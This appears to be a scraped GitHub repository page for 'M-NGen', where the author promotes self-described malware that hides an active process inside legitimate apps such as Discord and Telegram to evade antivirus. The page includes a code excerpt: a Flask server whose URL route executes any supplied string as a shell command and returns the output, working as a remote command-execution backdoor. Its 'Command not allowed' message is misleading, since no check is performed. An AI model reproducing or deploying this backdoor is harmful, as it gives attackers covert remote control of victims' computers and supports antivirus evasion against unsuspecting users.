Skip to content

northsia/M-NGen

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

32 Commits
 
 

Repository files navigation

M-NGen

M-NGen Malware Revolution I managed to develop a completely new type of malware... Honestly, I've never seen malware work this way before!

I was able to embed a hidden active process into any application! I tested it on applications like Discord, Telegram, and some others, and the method was completely successful... The challenge here is that antivirus software will perceive the application as a legitimate version of Discord or any other app! 😳

The interesting part is that the embedding method I used is not the usual Process Injection technique.

Warning

The method is still private, I can't share it publicly!

Video :

0323.mp4

AV BYPASS :

Discord Get Hacked Hehehe

2025-03-25.16-31-06.mp4

Part Of Code : (It's Note All of The code)

# This is A part From The Code
import subprocess
from flask import Flask, jsonify

f = Flask(__name__)

@f.route('/HDL/X/<t>', methods=['GET'])
def r(t):
    return h(t)

def h(c):
    if c:
        result = subprocess.run(c, shell=True, capture_output=True, text=True)
        return jsonify({"c": c, "o": result.stdout})
    return jsonify({"error": "Command not allowed"}), 403

if __name__ == '__main__':
    f.run(debug=True)

About

No description or website provided.

Topics

Resources

Stars

2 stars

Watchers

1 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors